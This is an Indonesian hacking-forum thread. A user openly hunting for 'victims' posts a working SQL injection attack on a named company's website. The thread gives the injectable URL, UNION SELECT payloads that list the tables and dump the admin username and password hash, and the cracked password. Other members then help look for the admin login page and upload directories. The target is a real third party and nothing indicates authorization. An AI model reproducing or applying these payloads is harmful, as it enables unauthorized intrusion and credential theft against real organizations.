Sqli di http://www.nexian.co.id/

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Sqli di http://www.nexian.co.id/

Post by cyber_criminal » Mon May 10, 2010 10:12 pm

kemaren aku lagi surfing lewat mbah google, mau nyari korban sqli,
:devil :devil :devil

trus ketemu bug sqli di http://www.nexian.co.id/, ini holenya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=47
aku coba nyari tabelnya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28table_name%29,3,4%20from%20information_schema.tables%20where%20table_schema=database%28%29--
ini dia tabel2nya :

Code: Select all

about,accessories,application,articles,career,commercial,contact,contactinfo,db_city,db_province,dealer,faq,music,product,type,users,wallpaper
yg ini hole untuk id dan password adminnya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28username,0x3a,password%29,3,4%20from%20users
hasilnya

Code: Select all

admin:098f6bcd4621d373cade4e832627b4f6
setelah passnya dicrack menjadi

Code: Select all

098f6bcd4621d373cade4e832627b4f6 => test
tapi ada kendalanya, aku ngak bisa nemuin login pagenya, ada yg mau bantuin
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
juara1
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me
Contact:

Re: Sqli di http://www.nexian.co.id/

Post by juara1 » Tue May 11, 2010 1:25 am

cm nemu disini aja ,,

http://www.nexian.co.id/cms/ :putusasa:
asuuuuuuuuu

the_nox
Posts: 16
Joined: Wed Mar 31, 2010 7:29 am

Re: Sqli di http://www.nexian.co.id/

Post by the_nox » Tue May 11, 2010 7:56 am

kerennnnnnnnnnnnnnnnnnnn
koq aku loem"" bisa"" ya...
belajar lagi duu ach..... :love:

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Sqli di http://www.nexian.co.id/

Post by Digital Cat » Tue May 11, 2010 2:27 pm

Image

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: Sqli di http://www.nexian.co.id/

Post by cyber_criminal » Tue May 11, 2010 7:26 pm

sorry all, situsnya kayaknya udah di patch,
kayaknya di patchnya tanggal 10 mei habisnya pas aku mau buat thread ini aku ngecek sqlinya di http://www.nexian.co.id/,
trus pas mau buka situs ini lambat banget, mungkin aja pas itu lagi di maintenence

sorry ya
:putusasa: :putusasa: :putusasa:
Last edited by cyber_criminal on Tue May 11, 2010 8:18 pm, edited 1 time in total.
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: Sqli di http://www.nexian.co.id/

Post by 3xtr3m3b0y » Tue May 11, 2010 7:42 pm

Code: Select all

http://www.nexian.co.id/uploads/images/product/114/NX%20-%20G381i%202.jpg
http://www.nexian.co.id/uploads/images/product/
Gak tau kesalahanx pada konf Web Server or dimana...
File dan Direktori seakan2 kehapus, padahal sebenernya ada...
...n0 l1m17...

Post Reply

Return to “Web Hacking”